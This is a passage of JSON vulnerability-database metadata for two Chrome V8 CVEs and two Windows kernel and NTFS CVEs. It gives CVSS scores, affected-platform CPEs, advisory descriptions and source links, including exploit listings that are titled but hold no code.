CVE-2021-21224\nChrom...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-28T01:10:54", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2022-02-15T06:55:14", "id": "CAE25BF5-2DB9-5000-8FF9-CC2EAA626ECE", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:33", "description": "# CVE-2021-21220\n\n...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T03:11:41", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2022-08-18T03:33:04", "id": "FCD264DC-601D-5F11-BFEF-BB041077ABB8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31955", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows NTFS Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows NTFS Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 JavaScript Engine Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21224", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Chromium V8 Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21220", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-08-16T18:28:47", "description": "Windows Kernel Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31955", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T18:28:47", "description": "Windows NTFS Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31956", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:21:14", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\nThis vulnerability was addressed in Microsoft Edge (Chromium-based) in build 90.0.818.41 which was released April 16, 2021.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T20:16:16", "type": "mscve", "title": "Chromium: CVE-2021-21224 Type Confusion in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-04-22T20:16:16", "id": "MS:CVE-2021-21224", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:21:14", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n\nMicrosoft is aware of reports that exploits for CVE-2021-21220 exist in the wild.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T07:00:00", "type": "mscve", "title": "Chromium: CVE-2021-21220 Insufficient validation of untrusted input in V8 for x86_64", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-04-14T07:00:00", "id": "MS:CVE-2021-21220", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21220", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:14:39", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31955", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-10T18:04:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2021-31955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-04T17:27:46", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31956", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-31956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:35:58", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T17:15:00", "type": "cve", "title": "CVE-2021-21224", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-06-01T15:22:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2021-21224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-07T14:23:32", "description": "Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T17:15:00", "type": "cve", "title": "CVE-2021-21220", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21220", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}], "veracode": [{"lastseen": "2022-07-26T13:50:50", "description": "chromium is vulnerable to type confusion. The vulnerability is triggered by performing integer data type conversion, creating an out-of-bounds condition that could cause arbitrary memory read/write primitive.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T23:06:09", "type": "veracode", "title": "Type Confusion", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-06-01T17:14:05", "id": "VERACODE:30147", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30147/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T13:50:56", "description": "chromium is vulnerable to remote code execution. The vulnerability is caused by insufficient validation of untrusted input in V8 for x86_64, Google\u2019s high-performance JavaScript and WebAssembly engine that interprets code embedded in web pages. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-21T17:42:46", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-06-01T17:14:10", "id": "VERACODE:30066", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30066/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:19:54", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a\nremote attacker to execute arbitrary code inside a sandbox via a crafted\nHTML page.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=987358>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 